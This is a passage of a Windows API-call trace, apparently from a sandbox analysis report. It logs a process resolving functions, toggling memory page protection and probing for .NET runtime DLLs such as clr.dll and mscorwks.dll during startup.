BaseAddress=0x13ff43c*=0x7574b01c, NumberOfBytesToProtect=0x13ff440, NewAccessProtection=0x2, OldAccessProtection=0x13ff474 | out: BaseAddress=0x13ff43c*=0x7574b000, NumberOfBytesToProtect=0x13ff440, OldAccessProtection=0x13ff474*=0x4) returned 0x0 [0053.551] GetCurrentProcess () returned 0xffffffff [0053.551] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x13ff43c*=0x7574b020, NumberOfBytesToProtect=0x13ff440, NewAccessProtection=0x4, OldAccessProtection=0x13ff474 | out: BaseAddress=0x13ff43c*=0x7574b000, NumberOfBytesToProtect=0x13ff440, OldAccessProtection=0x13ff474*=0x2) returned 0x0 [0053.551] GetCurrentProcess () returned 0xffffffff [0053.551] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x13ff43c*=0x7574b020, NumberOfBytesToProtect=0x13ff440, NewAccessProtection=0x2, OldAccessProtection=0x13ff474 | out: BaseAddress=0x13ff43c*=0x7574b000, NumberOfBytesToProtect=0x13ff440, OldAccessProtection=0x13ff474*=0x4) returned 0x0 [0053.551] GetCurrentProcess () returned 0xffffffff [0053.551] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x13ff43c*=0x7574b02c, NumberOfBytesToProtect=0x13ff440, NewAccessProtection=0x4, OldAccessProtection=0x13ff474 | out: BaseAddress=0x13ff43c*=0x7574b000, NumberOfBytesToProtect=0x13ff440, OldAccessProtection=0x13ff474*=0x2) returned 0x0 [0053.552] GetCurrentProcess () returned 0xffffffff [0053.552] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x13ff43c*=0x7574b02c, NumberOfBytesToProtect=0x13ff440, NewAccessProtection=0x2, OldAccessProtection=0x13ff474 | out: BaseAddress=0x13ff43c*=0x7574b000, NumberOfBytesToProtect=0x13ff440, OldAccessProtection=0x13ff474*=0x4) returned 0x0 [0053.552] GetCurrentProcess () returned 0xffffffff [0053.552] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x13ff43c*=0x7574b048, NumberOfBytesToProtect=0x13ff440, NewAccessProtection=0x4, OldAccessProtection=0x13ff474 | out: BaseAddress=0x13ff43c*=0x7574b000, NumberOfBytesToProtect=0x13ff440, OldAccessProtection=0x13ff474*=0x2) returned 0x0 [0053.552] GetCurrentProcess () returned 0xffffffff [0053.552] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x13ff43c*=0x7574b048, NumberOfBytesToProtect=0x13ff440, NewAccessProtection=0x2, OldAccessProtection=0x13ff474 | out: BaseAddress=0x13ff43c*=0x7574b000, NumberOfBytesToProtect=0x13ff440, OldAccessProtection=0x13ff474*=0x4) returned 0x0 [0053.552] GetCurrentProcess () returned 0xffffffff [0053.552] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x13ff43c*=0x7574b074, NumberOfBytesToProtect=0x13ff440, NewAccessProtection=0x4, OldAccessProtection=0x13ff474 | out: BaseAddress=0x13ff43c*=0x7574b000, NumberOfBytesToProtect=0x13ff440, OldAccessProtection=0x13ff474*=0x2) returned 0x0 [0053.552] GetCurrentProcess () returned 0xffffffff [0053.552] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x13ff43c*=0x7574b074, NumberOfBytesToProtect=0x13ff440, NewAccessProtection=0x2, OldAccessProtection=0x13ff474 | out: BaseAddress=0x13ff43c*=0x7574b000, NumberOfBytesToProtect=0x13ff440, OldAccessProtection=0x13ff474*=0x4) returned 0x0 [0053.553] GetCurrentProcess () returned 0xffffffff [0053.553] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x13ff43c*=0x7574b0d4, NumberOfBytesToProtect=0x13ff440, NewAccessProtection=0x4, OldAccessProtection=0x13ff474 | out: BaseAddress=0x13ff43c*=0x7574b000, NumberOfBytesToProtect=0x13ff440, OldAccessProtection=0x13ff474*=0x2) returned 0x0 [0053.553] GetCurrentProcess () returned 0xffffffff [0053.553] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x13ff43c*=0x7574b0d4, NumberOfBytesToProtect=0x13ff440, NewAccessProtection=0x2, OldAccessProtection=0x13ff474 | out: BaseAddress=0x13ff43c*=0x7574b000, NumberOfBytesToProtect=0x13ff440, OldAccessProtection=0x13ff474*=0x4) returned 0x0 [0053.553] GetCurrentProcess () returned 0xffffffff [0053.553] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x13ff43c*=0x7574b0fc, NumberOfBytesToProtect=0x13ff440, NewAccessProtection=0x4, OldAccessProtection=0x13ff474 | out: BaseAddress=0x13ff43c*=0x7574b000, NumberOfBytesToProtect=0x13ff440, OldAccessProtection=0x13ff474*=0x2) returned 0x0 [0053.553] GetCurrentProcess () returned 0xffffffff [0053.553] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x13ff43c*=0x7574b0fc, NumberOfBytesToProtect=0x13ff440, NewAccessProtection=0x2, OldAccessProtection=0x13ff474 | out: BaseAddress=0x13ff43c*=0x7574b000, NumberOfBytesToProtect=0x13ff440, OldAccessProtection=0x13ff474*=0x4) returned 0x0 [0053.553] GetCurrentProcess () returned 0xffffffff [0053.553] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x13ff43c*=0x7574b124, NumberOfBytesToProtect=0x13ff440, NewAccessProtection=0x4, OldAccessProtection=0x13ff474 | out: BaseAddress=0x13ff43c*=0x7574b000, NumberOfBytesToProtect=0x13ff440, OldAccessProtection=0x13ff474*=0x2) returned 0x0 [0053.554] GetCurrentProcess () returned 0xffffffff [0053.554] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x13ff43c*=0x7574b124, NumberOfBytesToProtect=0x13ff440, NewAccessProtection=0x2, OldAccessProtection=0x13ff474 | out: BaseAddress=0x13ff43c*=0x7574b000, NumberOfBytesToProtect=0x13ff440, OldAccessProtection=0x13ff474*=0x4) returned 0x0 [0053.554] SetLastError (dwErrCode=0x0) [0053.554] GetProcAddress (hModule=0x756e0000, lpProcName="EventRegister") returned 0x779c1990 [0053.555] GetProcAddress (hModule=0x74bc0000, lpProcName="EventSetInformation") returned 0x779c2340 [0053.555] FreeLibrary (hLibModule=0x74bc0000) returned 1 [0053.556] SysReAllocStringLen (in: pbstr=0x13ff540*=0x0, psz="mscoree.dll", len=0xb | out: pbstr=0x13ff540*="mscoree.dll") returned 1 [0053.556] CharLowerBuffW (in: lpsz="mscoree.dll", cchLength=0xb | out: lpsz="mscoree.dll") returned 0xb [0053.556] GetModuleHandleW (lpModuleName="mscoree.dll") returned 0x74270000 [0053.586] GetProcAddress (hModule=0x74270000, lpProcName=0x8e) returned 0x7427def0 [0053.587] GetProcAddress (hModule=0x756e0000, lpProcName="RegOpenKeyExW") returned 0x756fe580 [0053.588] GetProcAddress (hModule=0x756e0000, lpProcName="RegQueryValueExW") returned 0x756fe5a0 [0053.588] GetProcAddress (hModule=0x756e0000, lpProcName="RegCloseKey") returned 0x756fed60 [0053.598] GetLastError () returned 0xcb [0053.599] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x772d0000 [0053.599] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77970000 [0053.599] GetModuleFileNameA (in: hModule=0x74150000, lpFilename=0x13ff85c, nSize=0x105 | out: lpFilename="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscoreei.dll" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\mscoreei.dll")) returned 0x3a [0053.599] GetCurrentProcess () returned 0xffffffff [0053.599] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x13ff960*=0x741c4010, NumberOfBytesToProtect=0x13ff964, NewAccessProtection=0x4, OldAccessProtection=0x13ff998 | out: BaseAddress=0x13ff960*=0x741c4000, NumberOfBytesToProtect=0x13ff964, OldAccessProtection=0x13ff998*=0x2) returned 0x0 [0053.599] GetCurrentProcess () returned 0xffffffff [0053.599] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x13ff960*=0x741c4010, NumberOfBytesToProtect=0x13ff964, NewAccessProtection=0x2, OldAccessProtection=0x13ff998 | out: BaseAddress=0x13ff960*=0x741c4000, NumberOfBytesToProtect=0x13ff964, OldAccessProtection=0x13ff998*=0x4) returned 0x0 [0053.599] GetCurrentProcess () returned 0xffffffff [0053.599] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x13ff960*=0x741c4014, NumberOfBytesToProtect=0x13ff964, NewAccessProtection=0x4, OldAccessProtection=0x13ff998 | out: BaseAddress=0x13ff960*=0x741c4000, NumberOfBytesToProtect=0x13ff964, OldAccessProtection=0x13ff998*=0x2) returned 0x0 [0053.600] GetCurrentProcess () returned 0xffffffff [0053.600] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x13ff960*=0x741c4014, NumberOfBytesToProtect=0x13ff964, NewAccessProtection=0x2, OldAccessProtection=0x13ff998 | out: BaseAddress=0x13ff960*=0x741c4000, NumberOfBytesToProtect=0x13ff964, OldAccessProtection=0x13ff998*=0x4) returned 0x0 [0053.600] GetCurrentProcess () returned 0xffffffff [0053.600] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x13ff960*=0x741c4018, NumberOfBytesToProtect=0x13ff964, NewAccessProtection=0x4, OldAccessProtection=0x13ff998 | out: BaseAddress=0x13ff960*=0x741c4000, NumberOfBytesToProtect=0x13ff964, OldAccessProtection=0x13ff998*=0x2) returned 0x0 [0053.600] GetCurrentProcess () returned 0xffffffff [0053.600] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x13ff960*=0x741c4018, NumberOfBytesToProtect=0x13ff964, NewAccessProtection=0x2, OldAccessProtection=0x13ff998 | out: BaseAddress=0x13ff960*=0x741c4000, NumberOfBytesToProtect=0x13ff964, OldAccessProtection=0x13ff998*=0x4) returned 0x0 [0053.600] GetCurrentProcess () returned 0xffffffff [0053.600] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x13ff960*=0x741c402c, NumberOfBytesToProtect=0x13ff964, NewAccessProtection=0x4, OldAccessProtection=0x13ff998 | out: BaseAddress=0x13ff960*=0x741c4000, NumberOfBytesToProtect=0x13ff964, OldAccessProtection=0x13ff998*=0x2) returned 0x0 [0053.600] GetCurrentProcess () returned 0xffffffff [0053.600] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x13ff960*=0x741c402c, NumberOfBytesToProtect=0x13ff964, NewAccessProtection=0x2, OldAccessProtection=0x13ff998 | out: BaseAddress=0x13ff960*=0x741c4000, NumberOfBytesToProtect=0x13ff964, OldAccessProtection=0x13ff998*=0x4) returned 0x0 [0053.601] GetCurrentProcess () returned 0xffffffff [0053.601] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x13ff960*=0x741c4048, NumberOfBytesToProtect=0x13ff964, NewAccessProtection=0x4, OldAccessProtection=0x13ff998 | out: BaseAddress=0x13ff960*=0x741c4000, NumberOfBytesToProtect=0x13ff964, OldAccessProtection=0x13ff998*=0x2) returned 0x0 [0053.601] GetCurrentProcess () returned 0xffffffff [0053.601] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x13ff960*=0x741c4048, NumberOfBytesToProtect=0x13ff964, NewAccessProtection=0x2, OldAccessProtection=0x13ff998 | out: BaseAddress=0x13ff960*=0x741c4000, NumberOfBytesToProtect=0x13ff964, OldAccessProtection=0x13ff998*=0x4) returned 0x0 [0053.601] GetCurrentProcess () returned 0xffffffff [0053.601] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x13ff960*=0x741c4050, NumberOfBytesToProtect=0x13ff964, NewAccessProtection=0x4, OldAccessProtection=0x13ff998 | out: BaseAddress=0x13ff960*=0x741c4000, NumberOfBytesToProtect=0x13ff964, OldAccessProtection=0x13ff998*=0x2) returned 0x0 [0053.601] GetCurrentProcess () returned 0xffffffff [0053.601] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x13ff960*=0x741c4050, NumberOfBytesToProtect=0x13ff964, NewAccessProtection=0x2, OldAccessProtection=0x13ff998 | out: BaseAddress=0x13ff960*=0x741c4000, NumberOfBytesToProtect=0x13ff964, OldAccessProtection=0x13ff998*=0x4) returned 0x0 [0053.601] GetCurrentProcess () returned 0xffffffff [0053.601] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x13ff960*=0x741c4074, NumberOfBytesToProtect=0x13ff964, NewAccessProtection=0x4, OldAccessProtection=0x13ff998 | out: BaseAddress=0x13ff960*=0x741c4000, NumberOfBytesToProtect=0x13ff964, OldAccessProtection=0x13ff998*=0x2) returned 0x0 [0053.602] GetCurrentProcess () returned 0xffffffff [0053.602] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x13ff960*=0x741c4074, NumberOfBytesToProtect=0x13ff964, NewAccessProtection=0x2, OldAccessProtection=0x13ff998 | out: BaseAddress=0x13ff960*=0x741c4000, NumberOfBytesToProtect=0x13ff964, OldAccessProtection=0x13ff998*=0x4) returned 0x0 [0053.602] GetCurrentProcess () returned 0xffffffff [0053.602] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x13ff960*=0x741c40a4, NumberOfBytesToProtect=0x13ff964, NewAccessProtection=0x4, OldAccessProtection=0x13ff998 | out: BaseAddress=0x13ff960*=0x741c4000, NumberOfBytesToProtect=0x13ff964, OldAccessProtection=0x13ff998*=0x2) returned 0x0 [0053.602] GetCurrentProcess () returned 0xffffffff [0053.602] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x13ff960*=0x741c40a4, NumberOfBytesToProtect=0x13ff964, NewAccessProtection=0x2, OldAccessProtection=0x13ff998 | out: BaseAddress=0x13ff960*=0x741c4000, NumberOfBytesToProtect=0x13ff964, OldAccessProtection=0x13ff998*=0x4) returned 0x0 [0053.602] GetCurrentProcess () returned 0xffffffff [0053.602] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x13ff960*=0x741c40a8, NumberOfBytesToProtect=0x13ff964, NewAccessProtection=0x4, OldAccessProtection=0x13ff998 | out: BaseAddress=0x13ff960*=0x741c4000, NumberOfBytesToProtect=0x13ff964, OldAccessProtection=0x13ff998*=0x2) returned 0x0 [0053.603] GetCurrentProcess () returned 0xffffffff [0053.603] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x13ff960*=0x741c40a8, NumberOfBytesToProtect=0x13ff964, NewAccessProtection=0x2, OldAccessProtection=0x13ff998 | out: BaseAddress=0x13ff960*=0x741c4000, NumberOfBytesToProtect=0x13ff964, OldAccessProtection=0x13ff998*=0x4) returned 0x0 [0053.603] GetCurrentProcess () returned 0xffffffff [0053.603] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x13ff960*=0x741c40ac, NumberOfBytesToProtect=0x13ff964, NewAccessProtection=0x4, OldAccessProtection=0x13ff998 | out: BaseAddress=0x13ff960*=0x741c4000, NumberOfBytesToProtect=0x13ff964, OldAccessProtection=0x13ff998*=0x2) returned 0x0 [0053.603] GetCurrentProcess () returned 0xffffffff [0053.603] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x13ff960*=0x741c40ac, NumberOfBytesToProtect=0x13ff964, NewAccessProtection=0x2, OldAccessProtection=0x13ff998 | out: BaseAddress=0x13ff960*=0x741c4000, NumberOfBytesToProtect=0x13ff964, OldAccessProtection=0x13ff998*=0x4) returned 0x0 [0053.603] GetCurrentProcess () returned 0xffffffff [0053.604] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x13ff960*=0x741c40b4, NumberOfBytesToProtect=0x13ff964, NewAccessProtection=0x4, OldAccessProtection=0x13ff998 | out: BaseAddress=0x13ff960*=0x741c4000, NumberOfBytesToProtect=0x13ff964, OldAccessProtection=0x13ff998*=0x2) returned 0x0 [0053.605] GetCurrentProcess () returned 0xffffffff [0053.605] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x13ff960*=0x741c40b4, NumberOfBytesToProtect=0x13ff964, NewAccessProtection=0x2, OldAccessProtection=0x13ff998 | out: BaseAddress=0x13ff960*=0x741c4000, NumberOfBytesToProtect=0x13ff964, OldAccessProtection=0x13ff998*=0x4) returned 0x0 [0053.605] GetCurrentProcess () returned 0xffffffff [0053.605] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x13ff960*=0x741c40c0, NumberOfBytesToProtect=0x13ff964, NewAccessProtection=0x4, OldAccessProtection=0x13ff998 | out: BaseAddress=0x13ff960*=0x741c4000, NumberOfBytesToProtect=0x13ff964, OldAccessProtection=0x13ff998*=0x2) returned 0x0 [0053.605] GetCurrentProcess () returned 0xffffffff [0053.605] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x13ff960*=0x741c40c0, NumberOfBytesToProtect=0x13ff964, NewAccessProtection=0x2, OldAccessProtection=0x13ff998 | out: BaseAddress=0x13ff960*=0x741c4000, NumberOfBytesToProtect=0x13ff964, OldAccessProtection=0x13ff998*=0x4) returned 0x0 [0053.605] GetCurrentProcess () returned 0xffffffff [0053.605] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x13ff960*=0x741c4104, NumberOfBytesToProtect=0x13ff964, NewAccessProtection=0x4, OldAccessProtection=0x13ff998 | out: BaseAddress=0x13ff960*=0x741c4000, NumberOfBytesToProtect=0x13ff964, OldAccessProtection=0x13ff998*=0x2) returned 0x0 [0053.606] GetCurrentProcess () returned 0xffffffff [0053.606] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x13ff960*=0x741c4104, NumberOfBytesToProtect=0x13ff964, NewAccessProtection=0x2, OldAccessProtection=0x13ff998 | out: BaseAddress=0x13ff960*=0x741c4000, NumberOfBytesToProtect=0x13ff964, OldAccessProtection=0x13ff998*=0x4) returned 0x0 [0053.606] GetCurrentProcess () returned 0xffffffff [0053.606] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x13ff960*=0x741c4150, NumberOfBytesToProtect=0x13ff964, NewAccessProtection=0x4, OldAccessProtection=0x13ff998 | out: BaseAddress=0x13ff960*=0x741c4000, NumberOfBytesToProtect=0x13ff964, OldAccessProtection=0x13ff998*=0x2) returned 0x0 [0053.606] GetCurrentProcess () returned 0xffffffff [0053.606] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x13ff960*=0x741c4150, NumberOfBytesToProtect=0x13ff964, NewAccessProtection=0x2, OldAccessProtection=0x13ff998 | out: BaseAddress=0x13ff960*=0x741c4000, NumberOfBytesToProtect=0x13ff964, OldAccessProtection=0x13ff998*=0x4) returned 0x0 [0053.606] GetCurrentProcess () returned 0xffffffff [0053.606] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x13ff960*=0x741c416c, NumberOfBytesToProtect=0x13ff964, NewAccessProtection=0x4, OldAccessProtection=0x13ff998 | out: BaseAddress=0x13ff960*=0x741c4000, NumberOfBytesToProtect=0x13ff964, OldAccessProtection=0x13ff998*=0x2) returned 0x0 [0053.606] GetCurrentProcess () returned 0xffffffff [0053.606] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x13ff960*=0x741c416c, NumberOfBytesToProtect=0x13ff964, NewAccessProtection=0x2, OldAccessProtection=0x13ff998 | out: BaseAddress=0x13ff960*=0x741c4000, NumberOfBytesToProtect=0x13ff964, OldAccessProtection=0x13ff998*=0x4) returned 0x0 [0053.606] GetCurrentProcess () returned 0xffffffff [0053.606] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x13ff960*=0x741c41b4, NumberOfBytesToProtect=0x13ff964, NewAccessProtection=0x4, OldAccessProtection=0x13ff998 | out: BaseAddress=0x13ff960*=0x741c4000, NumberOfBytesToProtect=0x13ff964, OldAccessProtection=0x13ff998*=0x2) returned 0x0 [0053.607] GetCurrentProcess () returned 0xffffffff [0053.607] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x13ff960*=0x741c41b4, NumberOfBytesToProtect=0x13ff964, NewAccessProtection=0x2, OldAccessProtection=0x13ff998 | out: BaseAddress=0x13ff960*=0x741c4000, NumberOfBytesToProtect=0x13ff964, OldAccessProtection=0x13ff998*=0x4) returned 0x0 [0053.607] SetLastError (dwErrCode=0xcb) [0053.607] GetProcAddress (hModule=0x74150000, lpProcName="RegisterShimImplCallback") returned 0x74154140 [0053.607] GetProcAddress (hModule=0x74150000, lpProcName="RegisterShimImplCleanupCallback") returned 0x0 [0053.607] GetProcAddress (hModule=0x74150000, lpProcName="SetShellShimInstance") returned 0x0 [0053.608] GetProcAddress (hModule=0x74150000, lpProcName="OnShimDllMainCalled") returned 0x74152dc0 [0053.608] GetProcAddress (hModule=0x74150000, lpProcName=0x7427606c) returned 0x0 [0053.608] GetProcAddress (hModule=0x74150000, lpProcName="_CorExeMain") returned 0x7415d3e0 [0053.610] CreateFileW (lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\\\v1.0.3705\\clr.dll" (normalized: "c:\\windows\\microsoft.net\\framework\\v1.0.3705\\clr.dll"), dwDesiredAccess=0x20000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x10000000, hTemplateFile=0x0) returned 0xffffffff [0053.613] GetLastError () returned 0x2 [0053.613] SysReAllocStringLen (in: pbstr=0x13ff22c*=0x0, psz="C:\\Windows\\Microsoft.NET\\Framework\\\\v1.0.3705\\clr.dll", len=0x35 | out: pbstr=0x13ff22c*="C:\\Windows\\Microsoft.NET\\Framework\\\\v1.0.3705\\clr.dll") returned 1 [0053.613] GetThreadLocale () returned 0x409 [0053.613] CompareStringW (Locale=0x409, dwCmpFlags=0x1, lpString1="C:\\Windows\\Microsoft.NET\\Framework\\\\v1.0.3705\\clr.dll", cchCount1=4, lpString2="\\\\?\\", cchCount2=4) returned 3 [0053.613] GetThreadLocale () returned 0x409 [0053.613] CompareStringW (Locale=0x409, dwCmpFlags=0x1, lpString1="C:\\Windows\\Microsoft.NET\\Framework\\\\v1.0.3705\\clr.dll", cchCount1=4, lpString2="\\??\\", cchCount2=4) returned 3 [0053.613] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\\\v1.0.3705\\clr.dll", nBufferLength=0x104, lpBuffer=0x13fefb0, lpFilePart=0x13fefac | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework\\v1.0.3705\\clr.dll", lpFilePart=0x13fefac*="clr.dll") returned 0x34 [0053.613] SysReAllocStringLen (in: pbstr=0x13ff22c*="C:\\Windows\\Microsoft.NET\\Framework\\\\v1.0.3705\\clr.dll", psz="C:\\Windows\\Microsoft.NET\\Framework\\v1.0.3705\\clr.dll", len=0x34 | out: pbstr=0x13ff22c*="C:\\Windows\\Microsoft.NET\\Framework\\v1.0.3705\\clr.dll") returned 1 [0053.613] SysReAllocStringLen (in: pbstr=0x13ff1dc*=0x0, psz="C:\\Windows\\Microsoft.NET\\Framework\\v1.0.3705\\clr.dll", len=0x34 | out: pbstr=0x13ff1dc*="C:\\Windows\\Microsoft.NET\\Framework\\v1.0.3705\\clr.dll") returned 1 [0053.613] CharLowerBuffW (in: lpsz="C:\\Windows\\Microsoft.NET\\Framework\\v1.0.3705\\clr.dll", cchLength=0x34 | out: lpsz="c:\\windows\\microsoft.net\\framework\\v1.0.3705\\clr.dll") returned 0x34 [0053.614] SysReAllocStringLen (in: pbstr=0x13ff22c*="C:\\Windows\\Microsoft.NET\\Framework\\v1.0.3705\\clr.dll", psz="c:\\windows\\microsoft.net\\framework\\v1.0.3705\\clr.dll", len=0x34 | out: pbstr=0x13ff22c*="c:\\windows\\microsoft.net\\framework\\v1.0.3705\\clr.dll") returned 1 [0053.614] SetLastError (dwErrCode=0x2) [0053.614] CreateFileW (lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\\\v1.0.3705\\mscorwks.dll" (normalized: "c:\\windows\\microsoft.net\\framework\\v1.0.3705\\mscorwks.dll"), dwDesiredAccess=0x20000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x10000000, hTemplateFile=0x0) returned 0xffffffff [0053.614] GetLastError () returned 0x2 [0053.615] SysReAllocStringLen (in: pbstr=0x13ff22c*=0x0, psz="C:\\Windows\\Microsoft.NET\\Framework\\\\v1.0.3705\\mscorwks.dll", len=0x3a | out: pbstr=0x13ff22c*="C:\\Windows\\Microsoft.NET\\Framework\\\\v1.0.3705\\mscorwks.dll") returned 1 [0053.615] GetThreadLocale () returned 0x409 [0053.615] CompareStringW (Locale=0x409, dwCmpFlags=0x1, lpString1="C:\\Windows\\Microsoft.NET\\Framework\\\\v1.0.3705\\mscorwks.dll", cchCount1=4, lpString2="\\\\?\\", cchCount2=4) returned 3 [0053.615] GetThreadLocale () returned 0x409 [0053.615] CompareStringW (Locale=0x409, dwCmpFlags=0x1, lpString1="C:\\Windows\\Microsoft.NET\\Framework\\\\v1.0.3705\\mscorwks.dll", cchCount1=4, lpString2="\\??\\", cchCount2=4) returned 3 [0053.615] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\\\v1.0.3705\\mscorwks.dll", nBufferLength=0x104, lpBuffer=0x13fefb0, lpFilePart=0x13fefac | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework\\v1.0.3705\\mscorwks.dll", lpFilePart=0x13fefac*="mscorwks.dll") returned 0x39 [0053.615] SysReAllocStringLen (in: pbstr=0x13ff22c*="C:\\Windows\\Microsoft.NET\\Framework\\\\v1.0.3705\\mscorwks.dll", psz="C:\\Windows\\Microsoft.NET\\Framework\\v1.0.3705\\mscorwks.dll", len=0x39 | out: pbstr=0x13ff22c*="C:\\Windows\\Microsoft.NET\\Framework\\v1.0.3705\\mscorwks.dll") returned 1 [0053.615] SysReAllocStringLen (in: pbstr=0x13ff1dc*=0x0, psz="C:\\Windows\\Microsoft.NET\\Framework\\v1.0.3705\\mscorwks.dll", len=0x39 | out: pbstr=0x13ff1dc*="C:\\Windows\\Microsoft.NET\\Framework\\v1.0.3705\\mscorwks.dll") returned 1 [0053.615] CharLowerBuffW (in: lpsz="C:\\Windows\\Microsoft.NET\\Framework\\v1.0.3705\\mscorwks.dll", cchLength=0x39 | out: lpsz="c:\\windows\\microsoft.net\\framework\\v1.0.3705\\mscorwks.dll") returned 0x39 [0053.615] SysReAllocStringLen (in: pbstr=0x13ff22c*="C:\\Windows\\Microsoft.NET\\Framework\\v1.0.3705\\mscorwks.dll", psz="c:\\windows\\microsoft.net\\framework\\v1.0.3705\\mscorwks.dll", len=0x39 | out: pbstr=0x13ff22c*="c:\\windows\\microsoft.net\\framework\\v1.0.3705\\mscorwks.dll") returned 1 [0053.615] SetLastError (dwErrCode=0x2) [0053.615] CreateFileW (lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\\\v1.1.4322\\clr.dll" (normalized: "c:\\windows\\microsoft.net\\framework\\v1.1.4322\\clr.dll"), dwDesiredAccess=0x20000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x10000000, hTemplateFile=0x0) returned 0xffffffff [0053.616] GetLastError () returned 0x2 [0053.616] SysReAllocStringLen (in: pbstr=0x13ff22c*=0x0, psz="C:\\Windows\\Microsoft.NET\\Framework\\\\v1.1.4322\\clr.dll", len=0x35 | out: pbstr=0x13ff22c*="C:\\Windows\\Microsoft.NET\\Framework\\\\v1.1.4322\\clr.dll") returned 1 [0053.616] GetThreadLocale () returned 0x409 [0053.616] CompareStringW (Locale=0x409, dwCmpFlags=0x1, lpString1="C:\\Windows\\Microsoft.NET\\Framework\\\\v1.1.4322\\clr.dll", cchCount1=4, lpString2="\\\\?\\", cchCount2=4) returned 3 [0053.616] GetThreadLocale () returned 0x409 [0053.616] CompareStringW (Locale=0x409, dwCmpFlags=0x1, lpString1="C:\\Windows\\Microsoft.NET\\Framework\\\\v1.1.4322\\clr.dll", cchCount1=4, lpString2="\\??\\", cchCount2=4) returned 3 [0053.616] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\\\v1.1.4322\\clr.dll", nBufferLength=0x104, lpBuffer=0x13fefb0, lpFilePart=0x13fefac | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework\\v1.1.4322\\clr.dll", lpFilePart=0x13fefac*="clr.dll") returned 0x34 [0053.616] SysReAllocStringLen (in: pbstr=0x13ff22c*="C:\\Windows\\Microsoft.NET\\Framework\\\\v1.1.4322\\clr.dll", psz="C:\\Windows\\Microsoft.NET\\Framework\\v1.1.4322\\clr.dll", len=0x34 | out: pbstr=0x13ff22c*="C:\\Windows\\Microsoft.NET\\Framework\\v1.1.4322\\clr.dll") returned 1 [0053.616] SysReAllocStringLen (in: pbstr=0x13ff1dc*=0x0, psz="C:\\Windows\\Microsoft.NET\\Framework\\v1.1.4322\\clr.dll", len=0x34 | out: pbstr=0x13ff1dc*="C:\\Windows\\Microsoft.NET\\Framework\\v1.1.4322\\clr.dll") returned 1 [0053.616] CharLowerBuffW (in: lpsz="C:\\Windows\\Microsoft.NET\\Framework\\v1.1.4322\\clr.dll", cchLength=0x34 | out: lpsz="c:\\windows\\microsoft.net\\framework\\v1.1.4322\\clr.dll") returned 0x34 [0053.616] 